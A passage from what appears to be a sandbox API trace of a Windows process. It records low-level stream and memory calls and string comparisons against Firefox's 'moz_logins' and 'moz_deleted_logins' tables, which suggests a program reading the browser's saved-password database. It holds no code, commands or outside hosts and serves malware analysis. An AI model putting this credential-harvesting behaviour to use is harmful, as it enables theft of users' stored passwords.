returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0589.427] LocalFree (hMem=0x57c380) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ffd8 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x55e080, libNewSize=0x56ffd8) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0x5d1a20 [0589.427] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ffd8 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x1e, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x55e080, libNewSize=0x56ffd8) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x9a) returned 0x5d1978 [0589.427] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x30, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5500d0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x55e080, libOffset=0x31, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x55e080, libNewSize=0x5500d0) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x106) returned 0x5d0c00 [0589.427] LocalFree (hMem=0x5500d0) returned 0x0 [0589.427] LocalFree (hMem=0x56ff38) returned 0x0 [0589.427] IUnknown:Release (This=0x55e080) returned 0x0 [0589.427] lstrcmpiA (lpString1="moz_deleted_logins", lpString2="moz_logins") returned -1 [0589.427] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.427] LocalFree (hMem=0x5d1a20) returned 0x0 [0589.427] LocalFree (hMem=0x5d1978) returned 0x0 [0589.427] LocalFree (hMem=0x58d840) returned 0x0 [0589.427] LocalFree (hMem=0x5d0c00) returned 0x0 [0589.427] LocalFree (hMem=0x570078) returned 0x0 [0589.427] IStream:LockRegion (This=0x598228, libOffset=0x7c05, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x598228, libOffset=0x7c05, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.427] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.427] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.427] IStream:LockRegion (This=0x598228, libOffset=0x7c06, cb=0x0, dwLockType=0x0) returned 0x0 [0589.427] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.427] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.427] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.428] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x598228, libOffset=0x7c07, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.428] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.428] LocalFree (hMem=0x2f49758) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0589.428] LocalFree (hMem=0x57c380) returned 0x0 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x5d1978) returned 0x0 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0xa1) returned 0x5d3958 [0589.428] LocalFree (hMem=0x5d1978) returned 0x0 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d8d8 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x25, cb=0x0, dwLockType=0x0) returned 0x0 [0589.428] IStream:SetSize (This=0x55e080, libNewSize=0x58d8d8) returned 0x0 [0589.428] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ffd8 [0589.428] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.428] IStream:LockRegion (This=0x55e080, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.429] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0589.429] LocalAlloc (uFlags=0x40, uBytes=0xbe) returned 0x5b7378 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x30, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x55e080, libNewSize=0x5b7378) returned 0x0 [0589.429] LocalAlloc (uFlags=0x40, uBytes=0xc6) returned 0x58c838 [0589.429] LocalFree (hMem=0x5b7378) returned 0x0 [0589.429] LocalFree (hMem=0x570078) returned 0x0 [0589.429] IUnknown:Release (This=0x55e080) returned 0x0 [0589.429] lstrcmpiA (lpString1="moz_logins", lpString2="moz_logins") returned 0 [0589.429] lstrcmpA (lpString1="index", lpString2="table") returned -1 [0589.429] LocalFree (hMem=0x58d840) returned 0x0 [0589.429] LocalFree (hMem=0x5d3958) returned 0x0 [0589.429] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.429] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.429] LocalFree (hMem=0x58c838) returned 0x0 [0589.429] LocalFree (hMem=0x56ff38) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x7b69, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x7b69, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x7b6a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x7b6b, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.429] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.429] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x598228, libOffset=0x7b6c, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.429] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.429] LocalFree (hMem=0x2f49758) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.429] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.429] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.429] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0589.430] LocalFree (hMem=0x57c380) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0xa7) returned 0x59a9c0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x59a9c0) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0xaf) returned 0x2ed5118 [0589.430] LocalFree (hMem=0x59a9c0) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d840 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x33, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x58d840) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x570078 [0589.430] LocalFree (hMem=0x58d840) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x3d, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0xdb) returned 0x2ed0148 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x55e080, libOffset=0x3e, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x55e080, libNewSize=0x2ed0148) returned 0x0 [0589.430] LocalAlloc (uFlags=0x40, uBytes=0xe3) returned 0x2ed3230 [0589.430] LocalFree (hMem=0x2ed0148) returned 0x0 [0589.430] LocalFree (hMem=0x56ff38) returned 0x0 [0589.430] IUnknown:Release (This=0x55e080) returned 0x0 [0589.430] lstrcmpiA (lpString1="moz_logins", lpString2="moz_logins") returned 0 [0589.430] lstrcmpA (lpString1="index", lpString2="table") returned -1 [0589.430] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.430] LocalFree (hMem=0x2ed5118) returned 0x0 [0589.430] LocalFree (hMem=0x570078) returned 0x0 [0589.430] LocalFree (hMem=0x58d840) returned 0x0 [0589.430] LocalFree (hMem=0x2ed3230) returned 0x0 [0589.430] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x7ad9, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x7ad9, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x7ada, cb=0x0, dwLockType=0x0) returned 0x0 [0589.430] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.430] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x598228, libOffset=0x7adb, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.431] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.431] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.431] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x598228, libOffset=0x7adc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.431] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.431] LocalFree (hMem=0x2f49758) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.431] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.431] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0589.431] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.431] IStream:LockRegion (This=0x55e080, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0589.431] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.431] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0589.431] LocalFree (hMem=0x57c380) returned 0x0 